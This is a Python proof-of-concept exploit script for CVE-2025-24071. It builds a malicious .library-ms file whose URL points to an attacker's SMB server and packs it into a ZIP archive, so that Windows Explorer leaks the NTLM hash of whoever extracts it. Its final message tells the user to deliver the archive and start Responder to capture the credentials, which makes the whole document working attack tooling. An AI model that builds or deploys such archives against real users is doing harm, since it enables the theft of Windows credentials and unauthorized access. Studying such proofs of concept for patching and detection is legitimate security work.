from os import rename from os.path import isfile from zipfile import ZipFile import xml.etree.ElementTree as elementTree import argparse #pretty colors :) RESET = "\033[0m" RED = "\033[31m" GREEN = "\033[32m" YELLOW = "\033[33m" BOLD = "\033[1m" def findLib(library): if not library.endswith(".library-ms"): library = library + ".library-ms" if isfile(library): pass else: try: rename("mal.library-ms", library) except (OSError, PermissionError, IsADirectoryError) as error: print(f"{BOLD}{RED}[-]{RESET} Error renaming library!") raise SystemExit(error) return library def malLib(library, server): contents = elementTree.parse(library) root = contents.getroot() nameSpace = root.tag.split("}")[0].strip("{") elementTree.register_namespace('', nameSpace) for element in root.iter(): if element.tag.endswith("url"): element.text = "\\\\" + server + "\\shared" contents.write(library, encoding="utf-8", xml_declaration=True) def mkZip(library, filename): if not filename.endswith(".zip"): filename = filename + ".zip" with ZipFile(filename, "w") as malZip: malZip.write(library) if __name__ == "__main__": parser = argparse.ArgumentParser(prog='CVE-2025-24071.py', description='This is a PoC for CVE-2025-24071, a bug in Windows Explorer that allows for NTLM hash disclosure via crafted archives.', epilog='PoC by 0xVoodoo - Don\'t be a skid :)' ) parser.add_argument('-s', '--server', required=True, help='Target IP/URL') parser.add_argument('-f', '--file', required=True, help='Output file name') parser.add_argument('-l', '--library', help='MS Library file name (default mal.library-ms)') args = parser.parse_args() print("===CVE-2025-24071 PoC by 0xVoodoo===") if args.library: library = findLib(args.library) else: library = "mal.library-ms" print(f"{BOLD}{YELLOW}[*]{RESET} Modifying library") malLib(library, args.server) print(f"{BOLD}{YELLOW}[*]{RESET} Creating ZIP archive") mkZip(library, args.file) print(f"{BOLD}{GREEN}[+]{RESET} ZIP archive created:", args.file) print(f"{BOLD}{YELLOW}[*]{RESET} Deliver the ZIP archive and start responder")